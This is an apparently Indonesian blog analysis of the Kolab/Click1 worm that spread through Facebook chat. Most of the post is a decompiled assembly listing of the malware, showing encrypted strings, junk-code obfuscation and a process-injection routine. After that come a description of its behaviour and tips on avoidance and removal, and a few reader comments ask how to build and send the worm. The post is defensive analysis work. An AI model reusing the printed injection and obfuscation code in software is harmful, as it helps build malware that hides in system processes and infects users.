virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:
n004010EF()
push ebp
mov ebp,esp
sub esp,10
push ebx
push esi
xor ecx,ecx
xor esi,esi
push edi
mov dword ptr [ebp-0C],ecx
xor ebx,ebx
l00401101:
mov eax,ecx
cdq
push 0F
pop edi
idiv edi
mov byte ptr [ecx+00417DB0],cl
inc ecx
cmp ecx,00000100
mov al,[edx+00416FC4]
mov byte ptr [ecx+004182BF],al
jl 00401101
l00401124:
xor eax,eax
mov edi,000000FF
l0040112B:
movzx edx,byte ptr [eax+00417DB0]
movzx ecx,byte ptr [eax+004182C0]
add edx,ebx
add ecx,edx
and ecx,edi
mov ebx,ecx
lea ecx,[ebx+00417DB0]
mov dl,[ecx]
xor byte ptr [eax+00417DB0],dl
mov dl,[eax+00417DB0]
xor byte ptr [ecx],dl
mov cl,[ecx]
xor byte ptr [eax+00417DB0],cl
inc eax
cmp eax,00000100
jl 0040112B
l00401167:
mov ebx,[ebp+08]
push ebx
call dword ptr [0041300C]
xor eax,eax
cmp byte ptr [ebx],al
mov dword ptr [ebp-04],eax
jz 00401185
l0040117A:
inc dword ptr [ebp-04]
mov ecx,[ebp-04]
cmp byte ptr [ecx+ebx],al
jnz 0040117A
l00401185:
cmp dword ptr [ebp-04],eax
mov dword ptr [ebp-08],eax
jle 004012EF
l00401191:
inc bx
mov eax,eax
or bx,ax
dec bl
ror cl,1C
dec eax
sub cx,ax
sub eax,00
inc eax
xor eax,ebx
not bl
neg bx
inc ebx
mov bx,bx
xor cl,al
sub eax,ecx
xor bl,F6
nop
inc esi
and esi,edi
movzx eax,byte ptr [esi+00417DB0]
add eax,[ebp-0C]
and eax,edi
mov dword ptr [ebp-0C],eax
lea eax,[eax+00417DB0]
mov cl,[eax]
xor byte ptr [esi+00417DB0],cl
mov cl,[esi+00417DB0]
xor byte ptr [eax],cl
mov cl,[eax]
xor byte ptr [esi+00417DB0],cl
movzx eax,byte ptr [eax]
movzx ecx,byte ptr [esi+00417DB0]
add eax,ecx
mov ecx,[ebp+08]
and eax,edi
mov dl,[eax+00417DB0]
mov eax,[ebp-08]
add eax,ecx
cmp dl,[eax]
mov byte ptr [00417A71],dl
mov dword ptr [ebp-10],eax
jnz 00401219
l00401211:
xor dl,dl
mov byte ptr [00417A71],dl
l00401219:
ror bx,19
not eax
sub al,00
or bx,ax
not ecx
and al,bl
sub bx,1B
ror cx,1B
add ax,cx
ror ecx,10
and cx,FF
add eax,000000B2
neg ecx
xor al,cl
or bl,1D
shl bl,12
sar bl,14
and ax,FFFF
and eax,ecx
not eax
dec ebx
or eax,ecx
not cl
ror bx,02
shl ebx,03
or eax,00
shl bl,1B
ror bl,0D
sub al,00
xor cx,ax
ror ecx,1C
or eax,00
add al,00
not ecx
inc cl
not bx
inc bx
sar bl,17
ror cl,04
nop
ror cx,05
and ecx,09
ror ebx,15
xor bl,cl
inc ecx
sub eax,00
shl cx,06
and bl,al
inc bx
or bx,00
inc eax
ror bl,10
shl bx,1B
and cx,0D
shl bx,04
shl cl,1A
and ecx,eax
neg bl
nop
inc ebx
and bl,FF
sar cx,13
ror bl,09
sub eax,ebx
ror ebx,19
add eax,3F
not bx
shl ax,13
dec bx
add al,cl
mov eax,[ebp-10]
xor byte ptr [eax],dl
inc dword ptr [ebp-08]
mov eax,[ebp-08]
cmp eax,[ebp-04]
jl 00401191
l004012EC:
mov ebx,[ebp+08]
l004012EF:
pop edi
pop esi
mov eax,ebx
pop ebx
leave
ret
fn004012F6()
mov eax,[004183CC]
push 00416D64
push eax
call dword ptr [00413014]
push 40
push 00003000
push dword ptr [esp+14]
push dword ptr [esp+14]
push dword ptr [esp+14]
call eax
ret
fn0040131D()
push 00416D40
push dword ptr [esp+10]
call dword ptr [00413014]
push dword ptr [esp+08]
push dword ptr [esp+08]
call eax
ret
fn00401337()
mov eax,[004183CC]
push 00416FD4
push eax
call dword ptr [00413014]
push dword ptr [esp+0C]
xor ecx,ecx
push dword ptr [esp+0C]
mov dword ptr [004183D0],eax
push ecx
push ecx
push 04
push ecx
push ecx
push ecx
push dword ptr [esp+24]
push ecx
call eax
ret
fn00401366()
mov eax,[004183CC]
push 00416D88
push eax
call dword ptr [00413014]
push 00
push dword ptr [esp+14]
push dword ptr [esp+14]
push dword ptr [esp+14]
push dword ptr [esp+14]
call eax
ret
fn0040138C()
mov eax,[004183CC]
push 00416DAC
push eax
call dword ptr [00413014]
push dword ptr [esp+08]
push dword ptr [esp+08]
call eax
ret
fn004013A8()
mov eax,[004183CC]
push 00416DD0
push eax
call dword ptr [00413014]
push dword ptr [esp+08]
push dword ptr [esp+08]
call eax
ret
fn004013C4()
mov edx,[004183CC]
push ebx
dec cl
inc bx
or bx,16
shl cx,15
neg ecx
or ax,bx
sub bl,DE
not ecx
ror cl,16
shl ax,1A
shl cx,0B
or eax,04
inc ebx
or eax,ebx
and eax,FF
inc cx
sar al,07
sub bl,cl
ror al,18
and bx,14
sub eax,00
shl bx,0B
and bl,06
add ebx,ecx
and bx,FF
or al,cl
push 00416F38
push edx
call dword ptr [00413014]
mov edx,eax
not ebx
neg eax
add bx,00
not bx
ror cl,09
sar al,1B
shl cl,14
ror bx,0E
inc ecx
ror ax,12
shl bl,18
sub eax,07
and ecx,ebx
nop
shl al,16
ror eax,12
sub cl,02
ror bl,05
ror eax,02
or bx,02
sub bx,00
sar ebx,07
neg eax
xor eax,66
ror cl,1C
neg eax
inc cl
dec ecx
inc eax
and bl,cl
ror eax,0F
mov bl,bl
nop
shl eax,16
neg cl
inc bl
not eax
add ebx,3F
ror ecx,08
sub al,00
nop
shl ecx,09
sar bx,1A
ror bl,0F
and ecx,06
not cl
ror eax,08
not bl
shl eax,04
ror al,0E
sub bl,E7
add cx,62
or ecx,ebx
ror eax,02
and ebx,18
xor ecx,000000E0
or ax,bx
shl bl,10
xor eax,0000009A
sar ecx,13
neg ebx
ror bx,18
neg al
ror ebx,1C
neg ax
push dword ptr [esp+08]
call edx
pop ebx
ret
fn004014DE()
push ecx
push ebx
push ebp
push esi
push edi
mov edi,eax
not bx
ror cl,09
sar al,1B
shl cl,14
ror bx,0E
inc ecx
ror ax,12
shl bl,18
push 00416FD4
call 004010EF
pop ecx
add bl,al
neg eax
xor cl,al
sub bx,00
shl al,14
not cx
mov eax,eax
or ecx,ebx
ror bl,1E
sub al,cl
xor ecx,ebx
sar al,0F
sub bx,0E
or bx,01
neg ax
not ebx
neg eax
add bx,00
push 00416D40
call 004010EF
pop ecx
ror bl,0B
and eax,11
push 00416D64
call 004010EF
pop ecx
inc ebx
dec bl
nop
not ebx
dec eax
neg eax
add eax,00
and eax,FF
and bx,14
add eax,ecx
sub ebx,00
or eax,00
neg cx
or ax,001A
mov bl,bl
xor eax,0000009E
inc cl
push 00416D88
call 004010EF
pop ecx
and cl,bl
add bl,91
shl ebx,14
sub ecx,00
xor ebx,ecx
ror al,01
neg bl
shl ax,1B
ror bx,02
dec bl
ror bl,17
or eax,14
sub al,00
ror ebx,09
neg eax
not bl
xor al,cl
shl eax,0E
push 00416DAC
call 004010EF
pop ecx
not cx
sar bl,01
dec cl
dec al
ror ecx,0F
or bl,cl
add cl,00
ror ecx,07
inc ebx
not eax
sub cx,bx
dec eax
sub eax,00
neg eax
sub cl,00
or bl,00
shl ebx,13
sub ax,bx
not ebx
inc bx
and al,bl
mov bx,bx
neg ecx
sub bx,cx
push 00416DD0
call 004010EF
mov dword ptr [esp],00416DF4
call 004010EF
mov ebp,00416F5C
push ebp
call 004010EF
mov esi,[00413018]
pop ecx
pop ecx
push 00416CB0
call esi
push 00416D1C
mov dword ptr [004183CC],eax
call esi
mov dword ptr [esp+10],eax
and ax,0001
sar bx,14
shl al,09
ror ecx,0B
or bl,00
dec bx
add ebx,ecx
neg eax
ror bl,17
not al
or cx,00
dec ax
ror bl,0E
inc al
push ebp
push dword ptr [004183CC]
call dword ptr [00413014]
mov dword ptr [00417D68],00000044
mov dword ptr [00417A90],00010007
cmp word ptr [edi],5A4D
mov dword ptr [004183C8],edi
jnz 00401773
l00401698:
mov esi,[edi+3C]
add esi,edi
cmp dword ptr [esi],00004550
jnz 00401773
l004016A9:
push 00417EB0
push 00417D68
call eax
push eax
call 00401337
push dword ptr [esp+1C]
push dword ptr [esi+34]
push dword ptr [00417EB0]
call 0040131D
push dword ptr [esi+50]
push dword ptr [esi+34]
push dword ptr [00417EB0]
call 004012F6
push dword ptr [esi+54]
push edi
push dword ptr [esi+34]
push dword ptr [00417EB0]
call 00401366
xor ebp,ebp
add esp,34
xor ebx,ebx
cmp word ptr [esi+06],bp
jbe 0040173D
l004016FD:
mov eax,[004183C8]
mov eax,[eax+3C]
add eax,ebp
lea eax,[eax+edi+000000F8]
push dword ptr [eax+10]
mov ecx,[eax+14]
mov dword ptr [00417A7C],eax
mov eax,[eax+0C]
add eax,[esi+34]
add ecx,edi
push ecx
push eax
push dword ptr [00417EB0]
call 00401366
movzx eax,word ptr [esi+06]
add esp,10
inc ebx
add ebp,28
cmp ebx,eax
jl 004016FD
l0040173D:
mov edi,00417A90
push edi
push dword ptr [00417EB4]
call 0040138C
mov eax,[esi+28]
add eax,[esi+34]
push edi
push dword ptr [00417EB4]
mov dword ptr [00417B40],eax
call 004013A8
push dword ptr [00417EB4]
call 004013C4
add esp,14
l00401773:
pop edi
pop esi
pop ebp
pop ebx
pop ecx
ret
fn00401779()
push ebx
push ebp
push esi
push edi
ror cx,07
shl al,03
push 00416CB0
call dword ptr [00413018]
mov edi,eax
and bl,FF
mov esi,[00413014]
push 00416E3C
push edi
call esi
mov dword ptr [004183D4],eax
shl bl,15
push 00416E60
push edi
call esi
mov dword ptr [004184DC],eax
ror bx,06
push 00416E84
push edi
call esi
mov dword ptr [004184E0],eax
mov eax,eax
push 00416EA8
push edi
call esi
mov dword ptr [004184E4],eax
neg ecx
mov eax,[004183D4]
xor ebp,ebp
cmp eax,ebp
jz 0040184F
l004017E4:
cmp dword ptr [004184DC],ebp
jz 0040184F
l004017EC:
cmp dword ptr [004184E0],ebp
jz 0040184F
l004017F4:
and bl,al
movzx ecx,word ptr [esp+14]
push 00000118
push ecx
push ebp
call eax
mov esi,eax
add cx,64
cmp esi,ebp
jnz 00401813
l0040180E:
shl bl,02
jmp 00401852
l00401813:
add bx,cx
push esi
push ebp
call dword ptr [004184E0]
mov edi,eax
and bl,07
cmp edi,ebp
jnz 0040182B
l00401827:
xor ecx,ebx
jmp 00401852
l0040182B:
and cx,ax
push esi
push ebp
call dword ptr [004184DC]
mov dword ptr [004184F8],eax
inc bl
push edi
call dword ptr [004184E4]
mov dword ptr [004184FC],eax
and ecx,eax
mov al,01
jmp 00401854
l0040184F:
ror al,1D
l00401852:
xor al,al
l00401854:
pop edi
pop esi
pop ebp
pop ebx
ret
fn00401859()
push ebx
mov ebx,[004184E8]
push ebp
mov ebp,[004184EC]
push esi
push edi
push 00416CB0
call dword ptr [00413018]
mov esi,[00413014]
mov edi,eax
push 00416ECC
push edi
call esi
push 00416EF0
push edi
mov dword ptr [00417A88],eax
call esi
push 00416F14
push edi
mov dword ptr [004183C0],eax
call esi
test ebx,ebx
mov dword ptr [00417DAC],eax
push ebp
jz 004018B6
---------------------------------------------------------------
Hebatnya, akun Facebook yang di
infeksi oleh virus tidak mengalami perubahan
sama sekali. Bahkan tidak ada pop up FB Chat
yang terbuka. Yang dibutuhkan oleh virus ini
hanyalah akun Facebook tersebut sedang login
saja. Kemungkinan besar hal ini terjadi supaya
korban virus tidak menyadari kalau komputernya
telah terinfeksi oleh Kolab/Click1 dan
menyebarkan banyak sekali FB Chat ke
kontak-kontak Facebooknya yang mengarahkan
untuk mendownload virus ini.
Jika Anda
meng-klik link pada pesan chat tersebut, maka
secara otomatis file akan terdownload ke dalam
komputer Anda. Dan jika Anda menjalankan file
tersebut, maka komputer Anda sudah pasti telah
terinfeksi.
Sulit dibasmi
dan menyebabkan BSOD (Bumi Serpong Ooo
Damai ??.. :p)
Kolab/Click1 tidak berjalan pada proses atau
services Windows, sehingga sulit menemukan dan
mematikan keberadaan worm/rootkit ini. Tetapi,
worm ini justru mendompleng atau menumpang
pada file svchost.exe milik Windows, sehingga
Anda akan sulit mematikan-nya. Jika Anda
memaksa mematikan file svchost.exe, komputer
akan mengalami blue
screen of death / BSOD. Termasuk jika Anda mencoba
melakukan scan menggunakan tools tertentu
seperti GMER, tools yang biasa digunakan untuk
mendeteksi rootkit. (lihat gambar 6)
Gambar 6,
Berusaha mematikan file svchost yang telah
didompleng, akan muncul BSOD
Broadcast ke
IP-IP tertentu
Walaupun tidak berjalan pada
proses atau services Windows, Kolab/Click1 memanfaatkan file svchost.exe
Windows, untuk melakukan broadcast pada IP-IP
tertentu. (lihat gambar 7)
Gambar 7,
Aktivitas broadcast yang dilakukan oleh Kolab/Click1
Mencantumkan
diri-nya pada Windows Firewall
Agar dapat berjalan bebas tanpa
hambatan, Kolab/Click1 mendaftarkan programnya pada
Windows Firewall, sehingga diperbolehkan untuk
melakukan koneksi dan broadcast. (lihat gambar
8)
Gambar 8,
Aktivitas broadcast yang dilakukan oleh Kolab/Click1
Tips Hindari Kolab/Click1
Berikut beberapa tips bagi Anda
jika tidak ingin terinfeksi dan menjadi korban
dari worm/rootkit ini
-
Hindari melakukan klik pada link yang dikirim pada Anda, baik melalui pesan chat FB atau status.
-
Beritahukan pada teman Anda, bahwa komputer tersebut telah terinfeksi virus, dan segera lakukan update dan scan komputer dengan antivirus yang terupdate.
-
Jangan melakukan copy link atau melakukan pemberitahuan disertai link tersebut, karena dengan begitu Anda justru ikut menyebarkan link yang mengandung virus tersebut.
-
Jangan meninggalkan FB Anda dalam keadaan aktif/login, sebaiknya Anda logout dahulu hingga Anda kembali.
-
Gunakan Secure HTTP / HTTPS pada saat Login FB, hal ini agar FB Anda tidak mudah diakses oleh orang lain disekitar Anda.
Apa yang harus dilakukan jika sudah terlajur terinfeksi?Apabila kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa melakukan beberapa langkah berikut:- Tutup akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah penyebaran lebih banyak ke teman-teman facebook kita.
- Pastikan di Komputer anda terinstall program Antivirus (disarankan ativirus luar), dan lakukan update database ke versi paling terbaru.
- Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya W32/Kolab.xxx atau Trojan.Click1.xxxx) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.
- Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.
Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan. Dari beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat facebook ini merupakan varian terbaru dari worm kolab (worm jaringan) yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan.Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.
bg cara kirimnya ke via chat bagaimana?? disitu kyak gk ada tertulis?
BalasHapustataian
BalasHapusKomentar ini telah dihapus oleh pengarang.
BalasHapuslah buat nya gmn?
BalasHapus